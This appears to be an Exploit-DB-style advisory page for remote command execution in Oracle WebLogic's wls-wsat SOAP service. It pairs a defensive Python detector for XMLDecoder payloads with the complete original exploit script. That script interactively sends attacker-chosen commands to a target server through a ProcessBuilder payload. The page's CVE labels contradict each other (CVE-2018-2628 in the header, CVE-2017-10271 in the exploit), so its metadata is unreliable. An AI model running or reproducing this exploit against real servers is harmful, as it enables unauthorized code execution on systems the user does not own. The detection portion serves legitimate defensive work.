Vendor: WebLogic Server
By: Ricardo J. Rodríguez
CVSS: 9.8 (CRITICAL)
Type: Remote Code Execution
CWE: 78
Product Name: WebLogic Server
Affected Version From: 10.3.6.0.0
Affected Version To: 12.2.1.3.0
Patch Exists: YES
Related CWE: CVE-2018-2628
CPE: a:oracle:weblogic_server
Platforms Tested: Windows, Linux, Mac
2018

Remote Code Execution in Oracle WebLogic Server

This exploit allows an attacker to execute arbitrary commands on a vulnerable Oracle WebLogic Server instance. The vulnerability exists because the WebLogic Server 'CoordinatorPortType' SOAP service (reached under /wls-wsat/) does not properly validate its input. An attacker can exploit it by sending a specially crafted SOAP request containing malicious Java code to the vulnerable service: in the exploit below, that code is a java.beans.XMLDecoder document in the WorkContext SOAP header that builds and starts a java.lang.ProcessBuilder. The code is executed on the server with the privileges of the WebLogic user.

Mitigation:

Oracle has released a patch to address this vulnerability. It is recommended to apply the patch as soon as possible.
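
To complement patching, requests of this shape can be flagged at a proxy or in captured traffic. The following is an added example, not part of the original advisory or exploit: it parses a request body and reports when a POST under /wls-wsat/ carries XMLDecoder elements inside a WorkContext header, as the exploit on this page does. The function names, the three verdict labels, the class and tag lists, and the sample requests are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Assumed lists: classes that mean command execution, and XMLDecoder element names.
RISKY_CLASSES = {"java.lang.ProcessBuilder", "java.lang.Runtime"}
DECODER_TAGS = {"java", "object", "void"}


def local(tag):
    """Strip the '{namespace}' prefix ElementTree puts on qualified names."""
    return tag.rsplit("}", 1)[-1]


def classify_wsat_request(method, path, body):
    """Return 'ignore', 'suspicious' or 'malicious' (hypothetical labels) for one request."""
    if method.upper() != "POST" or not path.lower().startswith("/wls-wsat/"):
        return "ignore"
    if b"<!DOCTYPE" in body or b"<!ENTITY" in body:
        return "suspicious"      # do not parse DTDs from untrusted input
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return "suspicious"      # malformed XML sent to this endpoint deserves a look
    verdict = "ignore"
    for ctx in (e for e in root.iter() if local(e.tag) == "WorkContext"):
        for el in ctx.iter():
            if el.get("class") in RISKY_CLASSES:
                return "malicious"
            if local(el.tag) in DECODER_TAGS:
                verdict = "suspicious"
    return verdict


# Constructed samples, not captured traffic; PB has no method call, so it is inert.
ENVELOPE = (b'<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
            b'<soapenv:Header>%s</soapenv:Header><soapenv:Body/></soapenv:Envelope>')
WORKCTX = (b'<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">'
           b'<java class="java.beans.XMLDecoder">%s</java></work:WorkContext>')
PB = b'<void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="1"/></void>'
URL = "/wls-wsat/CoordinatorPortType"
SAMPLES = [
    ("POST", URL, ENVELOPE % (WORKCTX % PB)),                     # decoder doc with ProcessBuilder
    ("POST", URL, ENVELOPE % (WORKCTX % b"<string>x</string>")),  # decoder doc, no risky class
    ("POST", URL, ENVELOPE % b""),                                # empty SOAP header
    ("GET", URL, b""),                                            # not a POST
]

if __name__ == "__main__":
    for method, path, body in SAMPLES:
        print(method, path, classify_wsat_request(method, path, body))
```

Parsing the XML instead of pattern-matching raw bytes means a different namespace prefix or a character reference inside the class attribute does not hide the class name from the check.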

Exploit-DB raw data:

import requests
import sys

url_in = sys.argv[1]
payload_url = url_in + "/wls-wsat/CoordinatorPortType"
payload_header = {'content-type': 'text/xml'}


def payload_command (command_in):
    html_escape_table = {
        "&": "&amp;",
        '"': "&quot;",
        "'": "&apos;",
        ">": "&gt;",
        "<": "&lt;",
    }
    command_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in command_in)+"</string>"
    payload_1 = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n" \
                "   <soapenv:Header> " \
                "       <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n" \
                "           <java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\"> \n" \
                "               <void class=\"java.lang.ProcessBuilder\"> \n" \
                "                  <array class=\"java.lang.String\" length=\"3\">" \
                "                      <void index = \"0\">                       " \
                "                          <string>cmd</string>                 " \
                "                      </void>                                    " \
                "                      <void index = \"1\">                       " \
                "                          <string>/c</string>                  " \
                "                      </void>                                    " \
                "                      <void index = \"2\">                       " \
                + command_filtered + \
                "                      </void>                                    " \
                "                  </array>" \
                "                  <void method=\"start\"/>" \
                "                  </void>" \
                "            </java>" \
                "        </work:WorkContext>" \
                "   </soapenv:Header>" \
                "   <soapenv:Body/>" \
                "</soapenv:Envelope>"
    return payload_1

def do_post(command_in):
    result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)

    if result.status_code == 500:
        print "Command Executed \n"
    else:
        print "Something Went Wrong \n"



print "***************************************************** \n" \
       "****************   Coded By 1337g  ****************** \n" \
       "*  CVE-2017-10271 Blind Remote Command Execute EXP  * \n" \
       "***************************************************** \n"

while 1:
    command_in = raw_input("Enter your command here: ")
    if command_in == "exit" : exit(0)
    do_post(command_in)